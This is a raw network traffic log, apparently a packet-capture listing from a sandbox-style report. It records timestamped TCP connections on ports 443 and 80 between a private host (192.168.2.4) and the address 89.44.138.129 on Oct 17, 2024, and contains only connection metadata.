                                                                                                                                                    Oct 17, 2024 14:18:18.482964039 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.483011961 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.483082056 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.483105898 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.483119965 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.483222961 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.602492094 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.602555037 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.602632046 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.602657080 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.602689028 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.602699041 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.721046925 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.721065998 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.721165895 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.721185923 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.721235037 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.840441942 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.840497017 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.840568066 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.840591908 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.840604067 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.840630054 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.959625006 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.959681034 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.959696054 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.959716082 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:18.959737062 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:18.959748030 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.079210997 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.079282999 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.079416990 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.079416990 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.079442024 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.079482079 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.106601954 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.106653929 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.106730938 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.106749058 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.106764078 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.106786013 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.219077110 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.219193935 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.219204903 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.219224930 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.219254971 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.219264984 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.321073055 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.321126938 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.321158886 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.321175098 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.321207047 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.321225882 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.438662052 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.438729048 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.438816071 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.438842058 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.438977003 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.438977003 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.520370007 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.520437002 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.520507097 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.520526886 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.520551920 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.520567894 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.576231003 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.576303005 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.576327085 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.576345921 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.576374054 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.576387882 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.680816889 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.680910110 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.681077957 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.681077957 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.681092978 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.681149006 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.745452881 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.745520115 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.745731115 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.745731115 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.745750904 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.745805025 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.814884901 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.814939022 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.815085888 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.815085888 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.815108061 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.815146923 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.915946007 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.915976048 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.916083097 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.916117907 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.916158915 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.944330931 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.944360971 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.944434881 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.944482088 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:19.944504023 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:19.944521904 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.042320967 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.042361975 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.042550087 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.042550087 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.042572975 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.042618990 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.105149031 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.105185986 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.105367899 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.105401993 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.105449915 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.162416935 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.162437916 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.162483931 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.162508965 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.162529945 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.162545919 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.226501942 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.226526022 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.226581097 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.226602077 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.226619005 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.226640940 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.284100056 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.284123898 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.284171104 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.284183979 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.284212112 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.284224033 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.345637083 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.345666885 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.345720053 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.345731974 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.345778942 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.412142038 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.412173033 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.412211895 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.412229061 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.412241936 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.412267923 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.465624094 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.465656996 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.465740919 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.465749979 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.465775013 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.465794086 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.532881975 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.532906055 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.532941103 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.532949924 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.532973051 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.532991886 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.533374071 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.533459902 CEST4434973189.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:20.533577919 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:20.536115885 CEST49731443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:25.151593924 CEST4973080192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:54.460419893 CEST4973880192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:54.465243101 CEST804973889.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:54.465349913 CEST4973880192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:54.465550900 CEST4973880192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:54.470738888 CEST804973889.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:55.355421066 CEST804973889.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:55.355501890 CEST4973880192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:55.366780996 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:55.366805077 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:55.366888046 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:55.381257057 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:55.381268978 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.283068895 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.283174038 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.419317961 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.419357061 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.419923067 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.419989109 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.424906969 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.471455097 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.885438919 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.885518074 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.885543108 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.885592937 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.890710115 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.890723944 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.890789032 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.890830040 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.890841007 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.890878916 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.894921064 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.964649916 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.964674950 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.964724064 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.964740038 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.964761019 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:56.964787960 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.083594084 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.083631039 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.083667040 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.083713055 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.083734035 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.083758116 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.199204922 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.199229956 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.199399948 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.199419975 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.199466944 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.316154003 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.316174984 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.316346884 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.316359043 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.316472054 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.433887005 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.433907986 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.433957100 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.433968067 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.433984995 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.434010029 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.550467968 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.550487041 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.550548077 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.550561905 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.550589085 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.550611019 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.552553892 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.552570105 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.552618980 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.552628040 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.554567099 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.673279047 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.673300028 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.673377991 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.673388958 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.673418999 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.673437119 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.790374994 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.790395975 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.790440083 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.790457010 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.790472984 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.792555094 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.906945944 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.906969070 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.907058954 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:57.907068014 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:57.907965899 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.023806095 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.023823977 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.023876905 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.023890018 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.023900986 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.025294065 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.025320053 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.025356054 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.025362015 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.025384903 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.025401115 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.141598940 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.141637087 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.141706944 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.141721964 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.141735077 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.141757011 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.257615089 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.257635117 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.257695913 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.257708073 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.257755995 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.259542942 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.259561062 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.259618044 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.259625912 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.261907101 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.375699043 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.375720978 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.375763893 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.375773907 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.375785112 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.375813007 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.416435003 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.416452885 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.416506052 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.416517019 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.416558981 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.493194103 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.493215084 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.493274927 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.493287086 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.493310928 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.493320942 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.609249115 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.609266996 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.609324932 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.609334946 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.609369993 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.609381914 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.611040115 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.611057997 CEST4434973989.44.138.129192.168.2.4
